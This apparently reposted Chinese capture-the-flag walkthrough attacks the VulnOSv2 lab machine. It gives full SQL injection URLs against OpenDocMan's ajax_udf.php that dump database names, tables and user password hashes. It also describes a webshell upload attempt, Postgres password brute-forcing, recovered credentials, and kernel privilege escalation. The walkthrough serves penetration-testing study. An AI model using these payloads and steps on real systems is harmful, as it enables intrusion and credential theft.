~ 云天收夏色 木叶落秋声 ~
本文的靶机为VulnOSv2
端口扫描
80探测
访问前端页面
全端口扫描,有一个6667端口(一款多平台上可使用的IRC守护程序)
wappalyzer信息收集
使用dirb进行目录扫描
都没有结果了,点击页面上的那个website,会跳转到这个页面
这里要看仔细一点,这里字体是黑色的,有一个页面路径/jabcd0cs,和用户密码guest/guest
去访问这个目录前可以直接使用这个用户登录一下ssh,很明显登录失败
访问并登录
登录成功
这里有一个文件上传(add document)
尝试上传shell.php(一句话木马),但是我们并不知道上传的目录在哪
再次目录扫描,这次扫描需要加上这个隐藏的路径jabcd0cs
这些方法都可以试试,还有一个执行文件的东西,找绝对路径,找到一句话木马的位置
可惜都不行
这时候就需要细心一点了
searchsploit漏洞检索,找到一个漏洞
有一个sql注入开始利用
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9
暴库
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata
# information_schema,drupal7,jabcd0cs,mysql,performance_schema,phpmyadmin
暴表(jabcd0cs表)
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables
where table_schema=database()
# odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms
暴字段(jabcd0cs表),但是没有任何关于密码的字段
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database()
# file_id,user_id,timestamp,action,id,admin,id,name,id,category,owner,realname,created,description,comment,status,department,default_rights,publishable,reviewer,reviewer_comments,id,name,fid,dept_id,rights,dept_id,user_id,id,type,active,id,modified_on,modified_by,note,revision,id,sys_name,sys_value,RightId,Description,id,name,value,descripti
这里有一个注意点,就是用字符串表名来查表的时候查不出来,payload如下:
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database() and table_name=odm_user
这里要把表的字符串换成16进制,6f646d5f75736572
所以完整暴字段(带表)的payload是
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database() and table_name=0x6f646d5f75736572
# id,username,password,department,phone,Email,last_name,first_name,pw_reset_code
查密码
http://192.168.111.194/jabcd0cs/ajax_udf.php
?q=1
&add_value=odm_user%20UNION%20SELECT%201,
group_concat(username,password),3,4,5,6,7,8,9 from odm_user
# webmin
# b78aae356709f8c31118ea613980954b # webmin1980
# guest
# 084e0343a0486ff05530df6c705c8bb4 # guest
知道了账号密码,第一时间测试ssh连接,连接成功了
内核信息收集
内核漏洞检索(没有漏洞)
历史命令,看到用户vulnosadmin的目录下面的文件,有很多hydra的文件
运行一下
使用make命令(Makefile 是一个文本文件,其中定义了如何构建程序所需的规则和步骤。)
再查看进程信息,ps -aux,包含了postgres数据库
将/usr/share/wordlists/metasploit/postgres_default_pass.txt和postgres_default_user.txt文件传到靶机上,进行
密码爆破。爆破出 postgres/postgres
登录postgres数据库
psql -h localhost -U postgres
l,注意,postgres数据库查询语句区分大小写
vulnosadmin / c4nuh4ckm3tw1c3
将此文件复制到网页根目录下面
本机下载,打开这个网站,并上传上去,点击旁边的那个框,就可以看到密码了
https://imagetostl.com/cn/view-blend-online
Tips:.blend 文件是 Blender 软件的专有文件格式,用于保存 3D 制作项目。
第二种方法,内核提权,信息收集
低版本的内核提权
传到靶机上,编译,并运行,提权成功
注意点
在使用sql注入的时候如果不能正常的根据表名查找数据,那么可以将其转换为十六进制,例如
http://192.168.111.194/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,
group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns
where table_schema=database() and table_name=0x6f646d5f75736572 # odm_user
postgres数据库的登录命令
psql -h localhost -U postgres
postgres数据库的查询语句,是区分大小写的
l :显示数据库
c:切换连接的数据库
原文始发于微信公众号(泷羽Sec):【oscp】Blender软件的信息泄露---VulnOSv2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论